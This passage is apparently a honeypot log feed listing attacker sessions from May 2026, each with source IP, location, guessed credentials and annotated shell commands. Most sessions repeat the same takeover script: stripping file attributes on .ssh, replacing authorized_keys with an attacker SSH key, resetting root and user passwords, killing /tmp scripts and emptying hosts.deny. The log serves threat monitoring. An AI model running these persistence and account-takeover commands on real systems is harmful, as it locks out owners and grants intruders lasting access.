$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "radio\nO7odhjSfbH5c\nO7odhjSfbH5c"|passwd|bash
$ Enter new UNIX password:
$ echo "radio\nO7odhjSfbH5c\nO7odhjSfbH5c\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 ghost_root_83 (42.200.78.78) β€” Kadoorie, Hong Kong Β· 2 sessions Β· 39 cmds
2026-05-23 03:57 EDT Β· as aroot/aroot, teamcity/teamcity
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:e16glsFxsGeu"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "teamcity\nbcZnhwNzlJUF\nbcZnhwNzlJUF"|passwd|bash
$ Enter new UNIX password:
$ echo "teamcity\nbcZnhwNzlJUF\nbcZnhwNzlJUF\n"|passwd
🎭 ghost_root_84 (41.90.100.147) β€” Nairobi, Kenya Β· 2 sessions Β· 39 cmds
2026-05-23 03:25 EDT Β· as aroot/aroot, ronald/ronald123
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:JB0jC94OPnPb"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "ronald123\njtobUInrXv6g\njtobUInrXv6g"|passwd|bash
$ Enter new UNIX password:
$ echo "ronald123\njtobUInrXv6g\njtobUInrXv6g\n"|passwd
🎭 yankee_root_34 (2.26.86.249) β€” Orem, United States Β· 1 session Β· 19 cmds
2026-05-23 03:38 EDT Β· as aroot/aroot
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:ZVcmFHXPSnQy"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 wraith_root_70 (190.181.44.194) β€” Cochabamba, Bolivia Β· 2 sessions Β· 39 cmds
2026-05-23 02:31 EDT Β· as root/k, shiva/shiva
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "shiva\nMgUg6xjyROUW\nMgUg6xjyROUW"|passwd|bash
$ Enter new UNIX password:
$ echo "shiva\nMgUg6xjyROUW\nMgUg6xjyROUW\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:hROIDnFI3yRK"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
🎭 star_root_33 (216.147.121.99) β€” Denver, United States Β· 1 session Β· 1 cmd
2026-05-23 03:08 EDT Β· as root/1234qwerQWER
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 phantom_root_71 (186.56.11.2) β€” Los Polvorines, Argentina Β· 1 session Β· 19 cmds
2026-05-23 02:42 EDT Β· as root/asd123...
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:7nBwrfzU8mDO"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 specter_root_72 (103.154.241.42) β€” Yangon, Myanmar Β· 2 sessions Β· 39 cmds
2026-05-23 02:05 EDT Β· as olivier/olivier, root/toorroot
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "olivier\npAABEsDMOFjC\npAABEsDMOFjC"|passwd|bash
$ Enter new UNIX password:
$ echo "olivier\npAABEsDMOFjC\npAABEsDMOFjC\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:mBRxBBpwk6oG"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
🎭 windmill_4 (185.147.127.223) β€” Ottoland, Netherlands Β· 1 session Β· 20 cmds
2026-05-23 02:23 EDT Β· as shiva/shiva
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "shiva\nWQ4vqEFDSmvU\nWQ4vqEFDSmvU"|passwd|bash
$ Enter new UNIX password:
$ echo "shiva\nWQ4vqEFDSmvU\nWQ4vqEFDSmvU\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 beefeater_root_3 (217.154.35.203) β€” London, United Kingdom Β· 1 session Β· 6 cmds
2026-05-23 02:15 EDT Β· as ftpuser/P@ssw0rd
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ echo β†’ Enter
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "P@ssw0rd\no3KNHuK8QfyK\no3KNHuK8QfyK"|passwd|bash
$ Enter new UNIX password:
$ echo "P@ssw0rd\no3KNHuK8QfyK\no3KNHuK8QfyK\n"|passwd
🎭 monsoon_root_10 (98.70.57.151) β€” Pune, India Β· 1 session Β· 19 cmds
2026-05-23 01:38 EDT Β· as root/Wangsu@2023
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:fGvFElWD1nJO"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 liberty_root_25 (45.205.27.52) β€” Los Angeles, United States Β· 1 session Β· 20 cmds
2026-05-23 01:29 EDT Β· as plex/plex
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "plex\nzTPsWZWeiN1r\nzTPsWZWeiN1r"|passwd|bash
$ Enter new UNIX password:
$ echo "plex\nzTPsWZWeiN1r\nzTPsWZWeiN1r\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 wok_root_21 (130.94.57.219) β€” Beijing, China Β· 1 session Β· 20 cmds
2026-05-23 01:24 EDT Β· as plex/plex
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "plex\nGDSSMdYMOLeF\nGDSSMdYMOLeF"|passwd|bash
$ Enter new UNIX password:
$ echo "plex\nGDSSMdYMOLeF\nGDSSMdYMOLeF\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 lantern_root_27 (106.58.220.34) β€” Kunming, China Β· 1 session Β· 20 cmds
2026-05-23 01:07 EDT Β· as znc-admin/znc-admin
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "znc-admin\nFpfXHWdh9G2g\nFpfXHWdh9G2g"|passwd|bash
$ Enter new UNIX password:
$ echo "znc-admin\nFpfXHWdh9G2g\nFpfXHWdh9G2g\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 monsoon_root_11 (103.211.59.6) β€” Bijnor, India Β· 1 session Β· 19 cmds
2026-05-23 01:01 EDT Β· as root/admin123
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:UnBUO4JemV8B"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 cipher_sol_2 (185.225.41.192) β€” Damascus, Syria Β· 1 session Β· 19 cmds
2026-05-23 00:04 EDT Β· as root/2020.
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
